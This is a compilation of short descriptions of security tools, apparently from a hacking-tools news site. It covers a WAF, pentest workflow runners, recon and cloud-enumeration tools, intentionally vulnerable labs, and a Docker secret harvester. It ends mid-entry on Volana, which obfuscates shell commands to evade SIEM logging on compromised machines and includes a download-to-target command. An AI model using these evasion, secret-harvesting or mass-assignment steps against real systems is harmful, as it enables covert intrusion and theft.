    πŸ‘¨β€πŸ’» Author

    Created by ALW1EZ with AI ❀️



    gitGRAB - This Tool Is Designed To Interact With The GitHub API And Retrieve Specific User Details, Repository Information, And Commit Emails For A Given User

    By: Unknown


    This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.


    Install Requests

    pip install requests

    Execute the program

    python3 gitgrab.py



    Lazywarden - Automatic Bitwarden Backup

    By: Unknown


    Secure, Automated, and Multi-Cloud Bitwarden Backup and Import System

    Lazywarden is a Python automation tool designed to Backup and Restore data from your vault, including Bitwarden attachments. It allows you to upload backups to multiple cloud storage services and receive notifications across multiple platforms. It also offers AES encrypted backups and uses key derivation with Argon2, ensuring maximum security for your data.


    Features

    • πŸ”’ Maximum Security: Data protection with AES-256 encryption and Argon2 key derivation.
    • πŸ”„ Automated Backups and Imports: Keep your Bitwarden vault up to date and secure.
    • βœ… Integrity Verification: SHA-256 hash to ensure data integrity on every backup.
    • ☁️ Multi-Cloud Support: Store backups to services such as Dropbox, Google Drive, pCloud, MEGA, NextCloud, Seafile, Storj, Cloudflare R2, Backblaze B2, Filebase (IPFS) and via SMTP.
    • πŸ–₯️ Local Storage: Save backups to a local path for greater control.
    • πŸ”” Real-Time Alerts: Instant notifications on Discord, Telegram, Ntfy and Slack.
    • πŸ—“οΈ Schedule Management: Integration with CalDAV, Todoist and Vikunja to manage your schedule.
    • 🐳 Easy Deployment: Quick setup with Docker Compose.
    • πŸ€– Full Automation and Custom Scheduling: Automatic backups with flexible scheduling options (daily, weekly, monthly, yearly). Integration with CalDAV, Todoist and Vikunja for complete tracking and email notifications.
    • πŸ”‘ Bitwarden Export to KeePass: Export Bitwarden items to a KeePass database (kdbx), including TOTP-seeded logins, URI, custom fields, card, identity attachments and secure notes.

    Platform CompatibilityΒ Β 



    Docf-Sec-Check - DockF-Sec-Check Helps To Make Your Dockerfile Commands More Secure

    By: Unknown


    DockF-Sec-Check helps to make your Dockerfile commands more secure.


    Done

    • [x] First-level security notification in the Dockerfile

    TODO List

    • [ ] Correctly detect the Dockerfile.
    • [ ] Second-level security notification in the Dockerfile.
    • [ ] Security notification in Docker images.
    • [ ] ***** (Private Repository)

    Installation

    From Source Code

    You can use virtualenv for package dependencies before installation.

    git clone https://github.com/OsmanKandemir/docf-sec-check.git
    cd docf-sec-check
    python setup.py build
    python setup.py install

    From Pypi

    The application is available on PyPI. To install with pip:

    pip install docfseccheck

    From Dockerfile

    You can run this application on a container after build a Dockerfile. You need to specify a path (YOUR-LOCAL-PATH) to scan the Dockerfile in your local.

    docker build -t docfseccheck .
    docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile docfseccheck -f /docf-sec-check/Dockerfile

    From DockerHub

    docker pull osmankandemir/docfseccheck:v1.0
    docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile osmankandemir/docfseccheck:v1.0 -f /docf-sec-check/Dockerfile


    Usage

    -f DOCKERFILE [DOCKERFILE], --file DOCKERFILE [DOCKERFILE] Dockerfile path. --file Dockerfile

    Function Usage

    from docfchecker import DocFChecker

    #Dockerfile is your file PATH.

    DocFChecker(["Dockerfile"])

    Development and Contribution

    See; CONTRIBUTING.md

    License

    Copyright (c) 2024 Osman Kandemir \ Licensed under the GPL-3.0 License.

    Donations

    If you like DocF-Sec-Check and would like to show support, you can use Buy A Coffee or Github Sponsors feature for the developer using the button below.

    Or

    Sponsor me : https://github.com/sponsors/OsmanKandemir 😊

    Your support will be much appreciated😊



    SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

    By: Unknown


    SafeLine is a self-hosted WAF(Web Application Firewall) to protect your web apps from attacks and exploits.

    A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL injection, XSS, code injection, os command injection, CRLF injection, ldap injection, xpath injection, RCE, XXE, SSRF, path traversal, backdoor, bruteforce, http-flood, bot abused, among others.


    How It Works


    By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse-proxy, protecting the server from exposure by having clients pass through the WAF before reaching the server.

    A WAF protects your web apps by filtering, monitoring, and blocking any malicious HTTP/S traffic traveling to the web application, and prevents any unauthorized data from leaving the app. It does this by adhering to a set of policies that help determine what traffic is malicious and what traffic is safe. Just as a proxy server acts as an intermediary to protect the identity of a client, a WAF operates in similar fashion but acting as an reverse proxy intermediary that protects the web app server from a potentially malicious client.

    its core capabilities include:

    • Defenses for web attacks
    • Proactive bot abused defense
    • HTML & JS code encryption
    • IP-based rate limiting
    • Web Access Control List

    Screenshots







    Get Live Demo

    FEATURES

    List of the main features as follows:

    • Block Web Attacks
    • It defenses for all of web attacks, such as SQL injection, XSS, code injection, os command injection, CRLF injection, XXE, SSRF, path traversal and so on.
    • Rate Limiting
    • Defend your web apps against DoS attacks, bruteforce attempts, traffic surges, and other types of abuse by throttling traffic that exceeds defined limits.
    • Anti-Bot Challenge
    • Anti-Bot challenges to protect your website from bot attacks, humen users will be allowed, crawlers and bots will be blocked.
    • Authentication Challenge
    • When authentication challenge turned on, visitors need to enter the password, otherwise they will be blocked.
    • Dynamic Protection
    • When dynamic protection turned on, html and js codes in your web server will be dynamically encrypted by each time you visit.


    Secator - The Pentester'S Swiss Knife

    By: Unknown


    secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


    Features

    • Curated list of commands

    • Unified input options

    • Unified output schema

    • CLI and library usage

    • Distributed options with Celery

    • Complexity from simple tasks to complex workflows

    • Customizable


    Supported tools

    secator integrates the following tools:

    Name Description Category
    httpx Fast HTTP prober. http
    cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
    gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
    gospider Fast web spider written in Go. http/crawler
    katana Next-generation crawling and spidering framework. http/crawler
    dirsearch Web path discovery. http/fuzzer
    feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
    ffuf Fast web fuzzer written in Go. http/fuzzer
    h8mail Email OSINT and breach hunting tool. osint
    dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
    dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
    subfinder Fast subdomain finder. recon/dns
    fping Find alive hosts on local networks. recon/ip
    mapcidr Expand CIDR ranges into IPs. recon/ip
    naabu Fast port discovery tool. recon/port
    maigret Hunt for user accounts across many websites. recon/user
    gf A wrapper around grep to avoid typing common patterns. tagger
    grype A vulnerability scanner for container images and filesystems. vuln/code
    dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
    msfconsole CLI to access and work with the Metasploit Framework. vuln/http
    wpscan WordPress Security Scanner vuln/multi
    nmap Vulnerability scanner using NSE scripts. vuln/multi
    nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
    searchsploit Exploit searcher. exploit/search

    Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

    Installation

    Installing secator

    Pipx
    pipx install secator
    Pip
    pip install secator
    Bash
    wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
    Docker
    docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
    The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier:
    alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
    Now you can run secator like if it was installed on baremetal:
    secator --help
    Docker Compose
    git clone https://github.com/freelabz/secator
    cd secator
    docker-compose up -d
    docker-compose exec secator secator --help

    Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

    Installing languages

    secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

    We provide utilities to install required languages if you don't manage them externally:

    Go
    secator install langs go
    Ruby
    secator install langs ruby

    Installing tools

    secator does not install any of the external tools it supports by default.

    We provide utilities to install or update each supported tool which should work on all systems supporting apt:

    All tools
    secator install tools
    Specific tools
    secator install tools <TOOL_NAME>
    For instance, to install `httpx`, use:
    secator install tools httpx

    Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

    Installing addons

    secator comes installed with the minimum amount of dependencies.

    There are several addons available for secator:

    worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
    secator install addons worker
    google Add support for Google Drive exporter (`-o gdrive`).
    secator install addons google
    mongodb Add support for MongoDB driver (`-driver mongodb`).
    secator install addons mongodb
    redis Add support for Redis backend (Celery).
    secator install addons redis
    dev Add development tools like `coverage` and `flake8` required for running tests.
    secator install addons dev
    trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
    secator install addons trace
    build Add `hatch` for building and publishing the PyPI package.
    secator install addons build

    Install CVEs

    secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

    secator install cves

    Checking installation health

    To figure out which languages or tools are installed on your system (along with their version):

    secator health

    Usage

    secator --help


    Usage examples

    Run a fuzzing task (ffuf):

    secator x ffuf http://testphp.vulnweb.com/FUZZ

    Run a url crawl workflow:

    secator w url_crawl http://testphp.vulnweb.com

    Run a host scan:

    secator s host mydomain.com

    and more... to list all tasks / workflows / scans that you can use:

    secator x --help
    secator w --help
    secator s --help

    Learn more

    To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



    Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

    By: Unknown


    The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


      About the Damn Vulnerable Drone


      What is the Damn Vulnerable Drone?

      The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

      Why was it built?

      The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

      Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

      The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

      How does it work?

      The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

      ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.

      While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.

      Features

      • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
      • Simulated Wireless Networking: Simulated Wifi (802.11) interfaces to practice wireless drone attacks.
      • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
      • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
      • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
      • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
      • Dynamic Flight Logging: Fully dynamic Ardupilot flight bin logs stored on a simulated SD Card.
      • Management Web Console: Simple to use simulator management web console used to trigger scenarios and drone flight states.
      • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
      • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.


      Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests

      By: Unknown


      Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.


      Disclaimer

      This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.

      Features

      • Enables the addition of custom headers within requests
      • Offers customization of various HTTP methods for both origin and target requests
      • Supports rate-limiting to manage request thresholds effectively
      • Provides the option to specify "ignored parameters" which the tool will ignore during execution
      • Improved the support in nested arrays/objects inside JSON data in responses

      What's Next

      • Support additional content types, such as "application/x-www-form-urlencoded"

      Installation & Usage

      Install requirements

      pip3 install -r requirements.txt

      Run the script

      python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"

      Arguments

      Forbidden Buster accepts the following arguments:

        -h, --help            show this help message and exit
      --fetch-from FETCH_FROM
      URL to fetch data from
      --target-req TARGET_REQ
      URL to send modified data to
      -H HEADER, --header HEADER
      Add a custom header. Format: 'Key: Value'
      -p PROXY, --proxy PROXY
      Use Proxy, Usage i.e: http://127.0.0.1:8080.
      -d DATA, --data DATA Add data to the request body. JSON is supported with escaping.
      --rate-limit RATE_LIMIT
      Number of requests per second
      --source-method SOURCE_METHOD
      HTTP method for the initial request. Default is GET.
      --target-method TARGET_METHOD
      HTTP method for the modified request. Default is PUT.
      --ignore-params IGNORE_PARAMS
      Parameters to ignore during modification, separated by comma.

      Example Usage:

      python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'



      Imperius - Make An Linux Kernel Rootkit Visible Again

      By: Unknown


      A make an LKM rootkit visible again.

      This tool is part of research on LKM rootkits that will be launched.


      It involves getting the memory address of a rootkit's "show_module" function, for example, and using that to call it, adding it back to lsmod, making it possible to remove an LKM rootkit.

      We can obtain the function address in very simple kernels using /sys/kernel/tracing/available_filter_functions_addrs, however, it is only available from kernel 6.5x onwards.

      An alternative to this is to scan the kernel memory, and later add it to lsmod again, so it can be removed.

      So in summary, this LKM abuses the function of lkm rootkits that have the functionality to become visible again.

      OBS: There is another trick of removing/defusing a LKM rootkit, but it will be in the research that will be launched.



      DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

      By: Unknown


      DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


      What is Docker?

      Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

      About Docker Hub

      Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

      Why OSINT on Docker Hub?

      Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

      1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

      2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

      3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

      4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

      5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

      Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

      How DockerSpy Works

      DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.

      Getting Started

      To use DockerSpy, follow these steps:

      1. Installation: Clone the DockerSpy repository and install the required dependencies.
      git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
      1. Usage: Run DockerSpy from terminal.
      dockerspy

      Custom Configurations

      To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions

      Disclaimer

      DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

      Contribution

      Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

      About the Author

      DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

      I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

      Consider following me:

      DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (2) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (3) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (4)


      Thanks

      Special thanks to @akaclandestine



      Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

      By: Unknown


      Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.



      Main Features

      - Wayback Crawler Machine
      - Google Dorking without limits
      - Github Information Grabbing
      - Subdomain Identifier
      - Cms/Technology Detector With Custom Headers

      Installation

      ~> git clone https://github.com/ankitdobhal/Ashok
      ~> cd Ashok
      ~> python3.7 -m pip3 install -r requirements.txt

      How to use Ashok?

      A detailed usage guide is available on Usage section of the Wiki.

      But Some index of options is given below:

      Docker

      Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

      $ docker pull powerexploit/ashok-v1.2
      $ docker container run -it powerexploit/ashok-v1.2 --help


        Credits



        CloudBrute - Awesome Cloud Enumerator

        By: Unknown


        A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

        The complete writeup is available. here


        Motivation

        we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
        Here is the list issues on previous approaches we tried to fix:

        • separated wordlists
        • lack of proper concurrency
        • lack of supporting all major cloud providers
        • require authentication or keys or cloud CLI access
        • outdated endpoints and regions
        • Incorrect file storage detection
        • lack support for proxies (useful for bypassing region restrictions)
        • lack support for user agent randomization (useful for bypassing rare restrictions)
        • hard to use, poorly configured

        Features

        • Cloud detection (IPINFO API and Source Code)
        • Supports all major providers
        • Black-Box (unauthenticated)
        • Fast (concurrent)
        • Modular and easily customizable
        • Cross Platform (windows, linux, mac)
        • User-Agent Randomization
        • Proxy Randomization (HTTP, Socks5)

        Supported Cloud Providers

        Microsoft: - Storage - Apps

        Amazon: - Storage - Apps

        Google: - Storage - Apps

        DigitalOcean: - storage

        Vultr: - Storage

        Linode: - Storage

        Alibaba: - Storage

        Version

        1.0.0

        Usage

        Just download the latest release for your operation system and follow the usage.

        To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

        It looks like this

        providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
        environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
        proxytype: "http" # socks5 / http
        ipinfo: "" # IPINFO.io API KEY

        For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

        We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

        After setting up your API key, you are ready to use CloudBrute.

         β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
        β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
        β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
        β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
        β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
        β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
        V 1.0.7
        usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
        -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
        <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
        [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
        [-m|--mode "<value>"] [-o|--output "<value>"]
        [-C|--configFolder "<value>"]

        Awesome Cloud Enumerator

        Arguments:

        -h --help Print help information
        -d --domain domain
        -k --keyword keyword used to generator urls
        -w --wordlist path to wordlist
        -c --cloud force a search, check config.yaml providers list
        -t --threads number of threads. Default: 80
        -T --timeout timeout per request in seconds. Default: 10
        -p --proxy use proxy list
        -a --randomagent user agent randomization
        -D --debug show debug logs. Default: false
        -q --quite suppress all output. Default: false
        -m --mode storage or app. Default: storage
        -o --output Output file. Default: out.txt
        -C --configFolder Config path. Default: config


        for example

        CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

        please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

        If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

        CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

        Dev

        • Clone the repo
        • go build -o CloudBrute main.go
        • go test internal

        in action

        How to contribute

        • Add a module or fix something and then pull request.
        • Share it with whomever you believe can use it.
        • Do the extra work and share your findings with community β™₯

        FAQ

        How to make the best out of this tool?

        Read the usage.

        I get errors; what should I do?

        Make sure you read the usage correctly, and if you think you found a bug open an issue.

        When I use proxies, I get too many errors, or it's too slow?

        It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

        too fast or too slow ?

        change -T (timeout) option to get best results for your run.

        Credits

        Inspired by every single repo listed here .



        VulnNodeApp - A Vulnerable Node.Js Application

        By: Unknown


        A vulnerable application made using node.js, express server and ejs template engine. This application is meant for educational purposes only.


        Setup

        Clone this repository

        git clone https://github.com/4auvar/VulnNodeApp.git

        Application setup:

        • Install the latest node.js version with npm.
        • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
        • Run command: npm install

        DB setup

        • Install and configure latest mysql version and start the mysql service/deamon
        • Login with root user in mysql and run below sql script:
        CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
        create database vuln_node_app_db;
        GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
        USE vuln_node_app_db;
        create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
        insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
        insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
        insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
        insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
        insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

        Set basic environment variable

        • User needs to set the below environment variable.
          • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
          • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
          • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
          • DATABASE_PASS (E.g: password or password you change in above DB script)

        Start the server

        • Open the command prompt/terminal and navigate to the location of your repository
        • Run command: npm start
        • Access the application at http://localhost:3000

        Vulnerability covered

        • SQL Injection
        • Cross Site Scripting (XSS)
        • Insecure Direct Object Reference (IDOR)
        • Command Injection
        • Arbitrary File Retrieval
        • Regular Expression Injection
        • External XML Entity Injection (XXE)
        • Node js Deserialization
        • Security Misconfiguration
        • Insecure Session Management

        TODO

        • Will add new vulnerabilities such as CORS, Template Injection, etc...
        • Improve application documentation

        Issues

        • In case of bugs in the application, feel free to create an issues on github.

        Contribution

        • Feel free to create a pull request for any contribution.

        You can reach me out at @4auvar



        Volana - Shell Command Obfuscation To Avoid Detection Systems

        By: Unknown


        Shell command obfuscation to avoid SIEM/detection system

        During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.

        volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage


        Usage

        You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

        ## Download it from github release
        ## If you do not have internet access from compromised machine, find another way
        curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

        ## Execute it
        ./volana

        ## You are now under the radar
        volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
        volana Β» [command]

        Keyword for volana console: * ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit: exit volana console

        from non interactive shell

        Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

        On attacker machine

        ## Build volana with encryption key
        make build.volana-with-encryption

        ## Transfer it on TARGET (the unique detectable command)
        ## [...]

        ## Encrypt the command you want to stealthy execute
